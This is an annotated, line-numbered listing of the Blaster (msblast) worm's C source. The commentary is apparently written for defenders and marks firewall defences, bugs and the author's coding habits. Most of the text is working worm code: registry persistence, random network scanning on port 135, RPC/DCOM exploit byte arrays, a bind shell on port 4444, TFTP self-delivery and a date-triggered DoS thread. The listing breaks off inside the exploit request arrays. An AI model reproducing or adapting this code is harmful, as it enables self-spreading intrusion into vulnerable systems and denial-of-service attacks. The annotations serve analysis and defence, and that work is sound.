evnUPG3q

1include <windows.h>
2
3#include /*IP_HDRINCL*/
4
5#include /*InternetGetConnectedState*/
6
7#pragma comment (lib, "ws2_32.lib")
8
9#pragma comment (lib, "wininet.lib")
10
11#pragma comment (lib, "advapi32.lib")
12
13
14
15
16
17/*
18
19* These strings aren't used in the worm, I put them here
20
21* so that whitehat researchers would discover them.
22
23*/
24
25const char msg1[]="billy gates why do you make this possible ?"
26
27" Stop making money and fix your software!!";
28
29
30
31
32
33#define MSBLAST_EXE "msblast.exe"
34
35
36
37/*
38
39* MS-RPC/DCOM runs over port 135.
40
41* DEFENSE: firewalling port 135 will prevent systems from
42
43* being exploited and will hinder the spread of this worm.
44
45*/
46
47#define MSRCP_PORT_135 135
48
49
50
51/*
52
53* The TFTP protocol is defined to run on port 69. Once this
54
55* worm breaks into a victim, it will command it to download
56
57* the worm via TFTP. Therefore, the worms briefly runs a
58
59* TFTP service to deliver that file.
60
61* DEFENSE: firewalling 69/udp will prevent the worm from
62
63* fully infected a host.
64
65*/
66
67#define TFTP_PORT_69 69
68
69
70
71/*
72
73* The shell-prompt is established over port 4444. The
74
75* exploit code (in the variable 'sc') commands the victim
76
77* to "bind a shell" on this port. The exploit then connects
78
79* to that port to send commands, such as TFTPing the
80
81* msblast.exe file down and launching it.
82
83* DEFENSE: firewalling 4444/tcp will prevent the worm from
84
85* spreading.
86
87*/
88
89#define SHELL_PORT_4444 4444
90
91
92
93
94
95/*
96
97* A simple string to hold the current IP address
98
99*/
100
101char target_ip_string[16];
102
103
104
105/*
106
107* A global variable to hold the socket for the TFTP service.
108
109*/
110
111int fd_tftp_service;
112
113
114
115/*
116
117* Global flag to indicate this thread is running. This
118
119* is set when the thread starts, then is cleared when
120
121* the thread is about to end.
122
123* This demonstrates that Buford isn't confident with
124
125* multi-threaded programming -- he should just check
126
127* the thread handle.
128
129*/
130
131int is_tftp_running;
132
133
134
135/*
136
137* When delivering the worm file to the victim, it gets the
138
139* name by querying itself using GetModuleFilename(). This
140
141* makes it easier to change the filename or to launch the
142
143* worm. */
144
145char msblast_filename[256+4];
146
147
148
149int ClassD, ClassC, ClassB, ClassA;
150
151
152
153int local_class_a, local_class_b;
154
155
156
157int winxp1_or_win2k2;
158
159
160
161
162
163ULONG WINAPI blaster_DoS_thread(LPVOID);
164
165void blaster_spreader();
166
167void blaster_exploit_target(int fd, const char *victim_ip);
168
169void blaster_send_syn_packet(int target_ip, int fd);
170
171
172
173
174
175/***************************************************************
176
177* This is where the 'msblast.exe' program starts running
178
179***************************************************************/
180
181void main(int argc, char *argv[])
182
183{
184
185WSADATA WSAData;
186
187char myhostname[512];
188
189char daystring[3];
190
191char monthstring[3];
192
193HKEY hKey;
194
195int ThreadId;
196
197register unsigned long scan_local=0;
198
199
200
201/*
202
203* Create a registry key that will cause this worm
204
205* to run every time the system restarts.
206
207* DEFENSE: Slammer was "memory-resident" and could
208
209* be cleaned by simply rebooting the machine.
210
211* Cleaning this worm requires this registry entry
212
213* to be deleted.
214
215*/
216
217RegCreateKeyEx(
218
219/*hKey*/ HKEY_LOCAL_MACHINE,
220
221/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\"
222
223"CurrentVersion\\Run",
224
225/*Reserved*/ 0,
226
227/*lpClass*/ NULL,
228
229/*dwOptions*/ REG_OPTION_NON_VOLATILE,
230
231/*samDesired */ KEY_ALL_ACCESS,
232
233/*lpSecurityAttributes*/ NULL,
234
235/*phkResult */ &hKey,
236
237/*lpdwDisposition */ 0);
238
239RegSetValueExA(
240
241hKey,
242
243"windows auto update",
244
2450,
246
247REG_SZ,
248
249MSBLAST_EXE,
250
25150);
252
253RegCloseKey(hKey);
254
255
256
257
258
259/*
260
261* Make sure this isn't a second infection. A common problem
262
263* with worms is that they sometimes re-infect the same
264
265* victim repeatedly, eventually crashing it. A crashed
266
267* system cannot spread the worm. Therefore, worm writers
268
269* now make sure to prevent reinfections. The way Blaster
270
271* does this is by creating a system "global" object called
272
273* "BILLY". If another program in the computer has already
274
275* created "BILLY", then this instance won't run.
276
277* DEFENSE: this implies that you can remove Blaster by
278
279* creating a mutex named "BILLY". When the computer
280
281* restarts, Blaster will falsely believe that it has
282
283* already infected the system and will quit.
284
285*/
286
287CreateMutexA(NULL, TRUE, "BILLY");
288
289if (GetLastError() == ERROR_ALREADY_EXISTS)
290
291ExitProcess(0);
292
293
294
295/*
296
297* Windows systems requires "WinSock" (the network API layer)
298
299* to be initialized. Note that the SYNflood attack requires
300
301* raw sockets to be initialized, which only works in
302
303* version 2.2 of WinSock.
304
305* BUFORD: The following initialization is needlessly
306
307* complicated, and is typical of programmers who are unsure
308
309* of their knowledge of sockets..
310
311*/
312
313if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0
314
315&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0
316
317&& WSAStartup(1, &WSAData) != 0)
318
319return;
320
321
322
323/*
324
325* The worm needs to read itself from the disk when
326
327* transferring to the victim. Rather than using a hard-coded
328
329* location, it discovered the location of itself dynamically
330
331* through this function call. This has the side effect of
332
333* making it easier to change the name of the worm, as well
334
335* as making it easier to launch it.
336
337*/
338
339GetModuleFileNameA(NULL, msblast_filename,
340
341sizeof(msblast_filename));
342
343
344
345/*
346
347* When the worm infects a dialup machine, every time the user
348
349* restarts their machine, the worm's network communication
350
351* will cause annoying 'dial' popups for the user. This will
352
353* make them suspect their machine is infected.
354
355* The function call below makes sure that the worm only
356
357* starts running once the connection to the Internet
358
359* has been established and not before.
360
361* BUFORD: I think Buford tested out his code on a machine
362
363* and discovered this problem. Even though much of the
364
365* code indicates he didn't spend much time on
366
367* testing his worm, this line indicates that he did
368
369* at least a little bit of testing.
370
371*/
372
373while (!InternetGetConnectedState(&ThreadId, 0))
374
375Sleep (20000); /*wait 20 seconds and try again */
376
377
378
379/*
380
381* Initialize the low-order byte of target IP address to 0.
382
383*/
384
385ClassD = 0;
386
387
388
389/*
390
391* The worm must make decisions "randomly": each worm must
392
393* choose different systems to infect. In order to make
394
395* random choices, the programmer must "seed" the random
396
397* number generator. The typical way to do this is by
398
399* seeding it with the current timestamp.
400
401* BUFORD: Later in this code you'll find that Buford calls
402
403* 'srand()' many times to reseed. This is largely
404
405* unnecessary, and again indicates that Buford is not
406
407* confident in his programming skills, so he constantly
408
409* reseeds the generator in order to make extra sure he
410
411* has gotten it right.
412
413*/
414
415srand(GetTickCount());
416
417
418
419/*
420
421* This initializes the "local" network to some random
422
423* value. The code below will attempt to figure out what
424
425* the true local network is -- but just in case it fails,
426
427* the initialization fails, using random values makes sure
428
429* the worm won't do something stupid, such as scan the
430
431* network around 0.0.0.0
432
433*/
434
435local_class_a = (rand() % 254)+1;
436
437local_class_b = (rand() % 254)+1;
438
439
440
441/*
442
443* This discovers the local IP address used currently by this
444
445* victim machine. Blaster randomly chooses to either infect
446
447* just the local ClassB network, or some other network,
448
449* therefore it needs to know the local network.
450
451* BUFORD: The worm writer uses a complex way to print out
452
453* the IP address into a string, then parse it back again
454
455* to a number. This demonstrates that Buford is fairly
456
457* new to C programming: he thinks in terms of the printed
458
459* representation of the IP address rather than in its
460
461* binary form.
462
463*/
464
465if (gethostname(myhostname, sizeof(myhostname)) != -1) {
466
467HOSTENT *p_hostent = gethostbyname(myhostname);
468
469
470
471if (p_hostent != NULL && p_hostent->h_addr != NULL) {
472
473struct in_addr in;
474
475const char *p_addr_item;
476
477
478
479memcpy(&in, p_hostent->h_addr, sizeof(in));
480
481sprintf(myhostname, "%s", inet_ntoa(in));
482
483
484
485p_addr_item = strtok(myhostname, ".");
486
487ClassA = atoi(p_addr_item);
488
489
490
491p_addr_item = strtok(0, ".");
492
493ClassB = atoi(p_addr_item);
494
495
496
497p_addr_item = strtok(0, ".");
498
499ClassC = atoi(p_addr_item);
500
501
502
503if (ClassC > 20) {
504
505/* When starting from victim's address range,
506
507* try to start a little bit behind. This is
508
509* important because the scanning logic only
510
511* move forward. */
512
513srand(GetTickCount());
514
515ClassC -= (rand() % 20);
516
517}
518
519local_class_a = ClassA;
520
521local_class_b = ClassB;
522
523scan_local = TRUE;
524
525}
526
527}
528
529
530
531
532
533/*
534
535* This chooses whether Blaster will scan just the local
536
537* network (40% chance) or a random network (60% chance)
538
539*/
540
541srand(GetTickCount());
542
543if ((rand() % 20) < 12)
544
545scan_local = FALSE;
546
547
548
549/*
550
551* The known exploits require the hacker to indicate whether
552
553* the victim is WinXP or Win2k. The worm has to guess. The
554
555* way it guesses is that it chooses randomly. 80% of the time
556
557* it will assume that all victims are WinXP, and 20% of the
558
559* time it will assume all victims are Win2k. This means that
560
561* propogation among Win2k machines will be slowed down by
562
563* the fact Win2k machines are getting DoSed faster than they
564
565* are getting exploited.
566
567*/
568
569winxp1_or_win2k2 = 1;
570
571if ((rand()%10) > 7)
572
573winxp1_or_win2k2 = 2;
574
575
576
577/*
578
579* If not scanning locally, then choose a random IP address
580
581* to start with.
582
583* BUG: this worm choose bad ranges above 224. This will
584
585* cause a bunch of unnecessary multicast traffic. Weird
586
587* multicast traffic has historically been an easy way of
588
589* detecting worm activity.
590
591*/
592
593if (!scan_local) {
594
595ClassA = (rand() % 254)+1;
596
597ClassB = (rand() % 254);
598
599ClassC = (rand() % 254);
600
601}
602
603
604
605
606
607/*
608
609* Check the date so that when in the certain range, it will
610
611* trigger a DoS attack against Micosoft. The following
612
613* times will trigger the DoS attack:
614
615* Aug 16 through Aug 31
616
617* Spt 16 through Spt 30
618
619* Oct 16 through Oct 31
620
621* Nov 16 through Nov 30
622
623* Dec 16 through Dec 31
624
625* This applies to all years, and is based on local time.
626
627* FAQ: The worm is based on "local", not "global" time.
628
629* That means the DoS attack will start from Japan,
630
631* then Asia, then Europe, then the United States as the
632
633* time moves across the globe.
634
635*/
636
637#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)
638
639#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT)
640
641GetDateFormat( LOCALE_409,
642
6430,
644
645NULL, /*localtime, not GMT*/
646
647"d",
648
649daystring,
650
651sizeof(daystring));
652
653GetDateFormat( LOCALE_409,
654
6550,
656
657NULL, /*localtime, not GMT*/
658
659"M",
660
661monthstring,
662
663sizeof(monthstring));
664
665if (atoi(daystring) > 15 && atoi(monthstring) > 8)
666
667CreateThread(NULL, 0,
668
669blaster_DoS_thread,
670
6710, 0, &ThreadId);
672
673
674
675/*
676
677* As the final task of the program, go into worm mode
678
679* trying to infect systems.
680
681*/
682
683for (;;)
684
685blaster_spreader();
686
687
688
689/*
690
691* It'll never reach this point, but in theory, you need a
692
693* WSACleanup() after a WSAStartup().
694
695*/
696
697WSACleanup();
698
699}
700
701
702
703
704
705
706
707/*
708
709* This will be called from CreateThread in the main worm body
710
711* right after it connects to port 4444. After the thread is
712
713* started, it then sends the string "
714
715* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents
716
717* the IP address of the attacker).
718
719* Once it sends the string, it then waits for 20 seconds for the
720
721* TFTP server to end. If the TFTP server doesn't end, it calls
722
723* TerminateThread.
724
725*/
726
727DWORD WINAPI blaster_tftp_thread(LPVOID p)
728
729{
730
731/*
732
733* This is the protocol format of a TFTP packet. This isn't
734
735* used in the code -- I just provide it here for reference
736
737*/
738
739struct TFTP_Packet
740
741{
742
743short opcode;
744
745short block_id;
746
747char data[512];
748
749};
750
751
752
753char reqbuf[512]; /* request packet buffer */
754
755struct sockaddr_in server; /* server-side port number */
756
757struct sockaddr_in client; /* client IP address and port */
758
759int sizeof_client; /* size of the client structure*/
760
761char rspbuf[512]; /* response packet */
762
763
764
765static int fd; /* the socket for the server*/
766
767register FILE *fp;
768
769register block_id;
770
771register int block_size;
772
773
774
775/* Set a flag indicating this thread is running. The other
776
777* thread will check this for 20 seconds to see if the TFTP
778
779* service is still alive. If this thread is still alive in
780
781* 20 seconds, it will be killed.
782
783*/
784
785is_tftp_running = TRUE; /*1 == TRUE*/
786
787
788
789/* Create a server-socket to listen for UDP requests on */
790
791fd = socket(AF_INET, SOCK_DGRAM, 0);
792
793if (fd == SOCKET_ERROR)
794
795goto closesocket_and_exit;
796
797
798
799/* Bind the socket to 69/udp */
800
801memset(&server, 0, sizeof(server));
802
803server.sin_family = AF_INET;
804
805server.sin_port = htons(TFTP_PORT_69);
806
807server.sin_addr.s_addr = 0; /*TFTP server addr = */
808
809if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)
810
811goto closesocket_and_exit;
812
813
814
815/* Receive a packet, any packet. The contents of the received
816
817* packet are ignored. This means, BTW, that a defensive
818
819* "worm-kill" could send a packet from somewhere else. This
820
821* will cause the TFTP server to download the msblast.exe
822
823* file to the wrong location, preventing the victim from
824
825* doing the download. */
826
827sizeof_client = sizeof(client);
828
829if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0,
830
831(struct sockaddr*)&client, &sizeof_client) <= 0)
832
833goto closesocket_and_exit;
834
835
836
837/* The TFTP server will respond with many 512 byte blocks
838
839* until it has completely sent the file; each block must
840
841* have a unique ID, and each block must be acknowledged.
842
843* BUFORD: The worm ignores TFTP ACKs. This is probably why
844
845* the worm restarts the TFTP service rather than leaving it
846
847* enabled: it essentially flushes all the ACKs from the
848
849* the incoming packet queue. If the ACKs aren't flushed,
850
851* the worm will incorrectly treat them as TFTP requests.
852
853*/
854
855block_id = 0;
856
857
858
859/* Open this file. GetModuleFilename was used to figure out
860
861* this filename. */
862
863fp = fopen(msblast_filename, "rb");
864
865if (fp == NULL)
866
867goto closesocket_and_exit;
868
869
870
871/* Continue sending file fragments until none are left */
872
873for (;;) {
874
875block_id++;
876
877
878
879/* Build TFTP header */
880
881#define TFTP_OPCODE_DATA 3
882
883*(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA);
884
885*(short*)(rspbuf+2)= htons((short)block_id);
886
887
888
889/* Read next block of data (about 12 blocks total need
890
891* to be read) */
892
893block_size = fread(rspbuf+4, 1, 512, fp);
894
895
896
897/* Increase the effective length to include the TFTP
898
899* head built above */
900
901block_size += 4;
902
903
904
905/* Send this block */
906
907if (sendto(fd, (char*)&rspbuf, block_size,
908
9090, (struct sockaddr*)&client, sizeof_client) <= 0)
910
911break;
912
913
914
915/* Sleep for a bit.
916
917* The reason for this is because the worm doesn't care
918
919* about retransmits -- it therefore must send these
920
921* packets slow enough so congestion doesn't drop them.
922
923* If it misses a packet, then it will DoS the victim
924
925* without actually infecting it. Worse: the intended
926
927* victim will continue to send packets, preventing the
928
929* worm from infecting new systems because the
930
931* requests will misdirect TFTP. This design is very
932
933* bad, and is my bet as the biggest single factor
934
935* that slows down the worm. */
936
937Sleep(900);
938
939
940
941/* File transfer ends when the last block is read, which
942
943* will likely be smaller than a full-sized block*/
944
945if (block_size != sizeof(rspbuf)) {
946
947fclose(fp);
948
949fp = NULL;
950
951break;
952
953}
954
955}
956
957
958
959if (fp != NULL)
960
961fclose(fp);
962
963
964
965closesocket_and_exit:
966
967
968
969/* Notify that the thread has stopped, so that the waiting
970
971* thread can continue on */
972
973is_tftp_running = FALSE;
974
975closesocket(fd);
976
977ExitThread(0);
978
979
980
981return 0;
982
983}
984
985
986
987
988
989
990
991
992
993/*
994
995* This function increments the IP address.
996
997* BUFORD: This conversion from numbers, to strings, then back
998
999* to number is overly complicated. Experienced programmers
1000
1001* would simply store the number and increment it. This shows
1002
1003* that Buford does not have much experience work with
1004
1005* IP addresses.
1006
1007*/
1008
1009void blaster_increment_ip_address()
1010
1011{
1012
1013for (;;) {
1014
1015if (ClassD <= 254) {
1016
1017ClassD++;
1018
1019return;
1020
1021}
1022
1023
1024
1025ClassD = 0;
1026
1027ClassC++;
1028
1029if (ClassC <= 254)
1030
1031return;
1032
1033ClassC = 0;
1034
1035ClassB++;
1036
1037if (ClassB <= 254)
1038
1039return;
1040
1041ClassB = 0;
1042
1043ClassA++;
1044
1045if (ClassA <= 254)
1046
1047continue;
1048
1049ClassA = 0;
1050
1051return;
1052
1053}
1054
1055}
1056
1057
1058
1059
1060
1061/*
1062
1063* This is called from the main() function in an
1064
1065* infinite loop. It scans the next 20 addresses,
1066
1067* then exits.
1068
1069*/
1070
1071void blaster_spreader()
1072
1073{
1074
1075fd_set writefds;
1076
1077
1078
1079register int i;
1080
1081struct sockaddr_in sin;
1082
1083struct sockaddr_in peer;
1084
1085int sizeof_peer;
1086
1087int sockarray[20];
1088
1089int opt = 1;
1090
1091const char *victim_ip;
1092
1093
1094
1095/* Create the beginnings of a "socket-address" structure that
1096
1097* will be used repeatedly below on the 'connect()' call for
1098
1099* each socket. This structure specified port 135, which is
1100
1101* the port used for RPC/DCOM. */
1102
1103memset(&sin, 0, sizeof(sin));
1104
1105sin.sin_family = AF_INET;
1106
1107sin.sin_port = htons(MSRCP_PORT_135);
1108
1109
1110
1111/* Create an array of 20 socket descriptors */
1112
1113for (i=0; i<20; i++) {
1114
1115sockarray[i] = socket(AF_INET, SOCK_STREAM, 0);
1116
1117if (sockarray[i] == -1)
1118
1119return;
1120
1121ioctlsocket(sockarray[i], FIONBIO , &opt);
1122
1123}
1124
1125
1126
1127/* Initiate a "non-blocking" connection on all 20 sockets
1128
1129* that were created above.
1130
1131* FAQ: Essentially, this means that the worm has 20
1132
1133* "threads" -- even though they aren't true threads.
1134
1135*/
1136
1137for (i=0; i<20; i++) {
1138
1139int ip;
1140
1141
1142
1143blaster_increment_ip_address();
1144
1145sprintf(target_ip_string, "%i.%i.%i.%i",
1146
1147ClassA, ClassB, ClassC, ClassD);
1148
1149
1150
1151ip = inet_addr(target_ip_string);
1152
1153if (ip == -1)
1154
1155return;
1156
1157sin.sin_addr.s_addr = ip;
1158
1159connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin));
1160
1161}
1162
1163
1164
1165/* Wait 1.8-seconds for a connection.
1166
1167* BUG: this is often not enough, especially when a packet
1168
1169* is lost due to congestion. A small timeout actually makes
1170
1171* the worm slower than faster */
1172
1173Sleep(1800);
1174
1175
1176
1177/* Now test to see which of those 20 connections succeeded.
1178
1179* BUFORD: a more experienced programmer would have done
1180
1181* a single 'select()' across all sockets rather than
1182
1183* repeated calls for each socket. */
1184
1185for (i=0; i<20; i++) {
1186
1187struct timeval timeout;
1188
1189int nfds;
1190
1191
1192
1193timeout.tv_sec = 0;
1194
1195timeout.tv_usec = 0;
1196
1197nfds = 0;
1198
1199
1200
1201FD_ZERO(&writefds);
1202
1203FD_SET((unsigned)sockarray[i], &writefds);
1204
1205
1206
1207if (select(0, NULL, &writefds, NULL, &timeout) != 1) {
1208
1209closesocket(sockarray[i]);
1210
1211} else {
1212
1213sizeof_peer = sizeof(peer);
1214
1215getpeername(sockarray[i],
1216
1217(struct sockaddr*)&peer, &sizeof_peer);
1218
1219victim_ip = inet_ntoa(peer.sin_addr);
1220
1221
1222
1223/* If connection succeeds, exploit the victim */
1224
1225blaster_exploit_target(sockarray[i], victim_ip);
1226
1227closesocket(sockarray[i]);
1228
1229}
1230
1231}
1232
1233
1234
1235}
1236
1237
1238
1239/*
1240
1241* This is where the victim is actually exploited. It is the same
1242
1243* exploit as created by xfocus and altered by HDMoore.
1244
1245* There are a couple of differences. The first is that the in
1246
1247* those older exploits, this function itself would create the
1248
1249* socket and connect, whereas in Blaster, the socket is already
1250
1251* connected to the victim via the scanning function above. The
1252
1253* second difference is that the packets/shellcode blocks are
1254
1255* declared as stack variables rather than as static globals.
1256
1257* Finally, whereas the older exploits give the hacker a
1258
1259* "shell prompt", this one automates usage of the shell-prompt
1260
1261* to tell the victim to TFTP the worm down and run it.
1262
1263*/
1264
1265void blaster_exploit_target(int sock, const char *victim_ip)
1266
1267{
1268
1269
1270
1271/* These blocks of data are just the same ones copied from the
1272
1273* xfocus exploit prototype. Whereas the original exploit
1274
1275* declared these as "static" variables, Blaster declares
1276
1277* these as "stack" variables. This is because the xfocus
1278
1279* exploit altered them -- they must be reset back to their
1280
1281* original values every time. */
1282
1283unsigned char bindstr[]={
1284
12850x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
1286
1287
1288
12890xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
1290
1291
1292
12930xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
1294
12950x00,0x00,0x00,0x00,
1296
12970x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
1298
12990x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
1300
1301
1302
1303
1304
1305
1306
1307unsigned char request1[]={
1308
13090x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
1310
1311,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
1312
1313
1314
1315,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
1316
1317
1318
1319,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
1320
1321
1322
1323,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
1324
1325
1326
1327,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
1328
1329
1330
1331,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
1332
1333
1334
1335,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
1336
1337
1338
1339,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
1340
1341
1342
1343,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
1344
1345
1346
1347,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
1348
1349
1350
1351,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
1352
1353
1354
1355,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
1356
1357
1358
1359,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
1360
1361
1362
1363,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1364
1365
1366
1367,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
1368
1369
1370
1371,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
1372
1373
1374
1375,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
1376
1377
1378
1379,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
1380
1381
1382
1383,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
1384
1385
1386
1387,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
1388
1389
1390
1391,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
1392
1393
1394
1395,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
1396
1397
1398
1399,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
1400
1401
1402
1403,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
1404
1405
1406
1407,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
1408
1409
1410
1411,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
1412
1413
1414
1415,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1416
1417
1418
1419,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1420
1421
1422
1423,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1424
1425
1426
1427,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1428
1429
1430
1431,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
1432
1433
1434
1435,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
1436
1437
1438
1439,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
1440
1441
1442
1443,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
1444
1445
1446
1447,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
1448
1449
1450
1451,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
1452
1453
1454
1455,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
1456
1457
1458
1459,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1460
1461
1462
1463,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
1464
1465
1466
1467,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
1468
1469
1470
1471,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
1472
1473
1474
1475,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
1476
1477
1478
1479,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
1480
1481
1482
1483,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
1484
1485
1486
1487,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1488
1489
1490
1491,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
1492
1493
1494
1495,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
1496
1497
1498
1499,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1500
1501
1502
1503,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
1504
1505
1506
1507,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
1508
1509
1510
1511,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1512
1513
1514
1515,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
1516
1517
1518
1519,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
1520
1521
1522
1523,0x00,0x00,0x00,0x00,0x00,0x00};
1524
1525
1526
1527unsigned char request2[]={
1528
15290x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
1530
1531,0x00,0x00,0x5C,0x00,0x5C,0x00};
1532
1533
1534
1535unsigned char request3[]={
1536
15370x5C,0x00
1538
1539,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
1540
1541
1542
1543,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
1544
1545
1546
